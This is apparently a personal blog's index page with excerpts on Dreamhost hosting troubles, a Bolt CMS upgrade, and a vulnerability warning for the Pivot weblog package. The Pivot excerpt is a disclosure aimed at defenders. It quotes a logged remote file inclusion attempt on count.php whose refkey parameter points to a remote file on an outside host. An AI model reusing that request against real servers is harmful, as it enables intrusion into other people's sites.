Hacking around memory limitations in shared hosting.

  api dreamhost memory php python web_applications wallabag

Longtime readers are aware that I've been a customer of Dreamhost for quite a few years now, and by and large they've done all right by me.  They haven't complained (much) about all the stuff I have running there, and I try to keep my hosted databases in good condition.  However, the server they have my stuff on is starting to act wonky.  Periodic outages mostly, but when my Wallabag installation started throwing all sorts of errors and generally not working right, that got under my skin in a fairly big hurry.  I reinstalled.  I upgraded to the latest stable …

Read more...

Upgrading Bolt CMS to v3.x.

  gotchas howto sysadmin upgrade web_applications bolt cms dreamhost php extensions shared_hosting

Since PivotX went out of support I've been running the Bolt CMS for my website at Dreamhost (referral link).  A couple of weeks back you may have noticed some trouble my site was having, due to my running into significant difficulty encountered when upgrading from the v2.x release series to the v3.x release series.  Some stuff went sideways, and I had to restore from backup at least once before I managed to get the upgrade procedure straightened out with the help of some of the developers in the Bolt IRC channel on Freenode.  If it wasn't for help …

Read more...

Remotely exploitable vulnerability found in Pivot v1.40.6!

  blogging exploit patch php pivot software vulnerability web

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

Read more...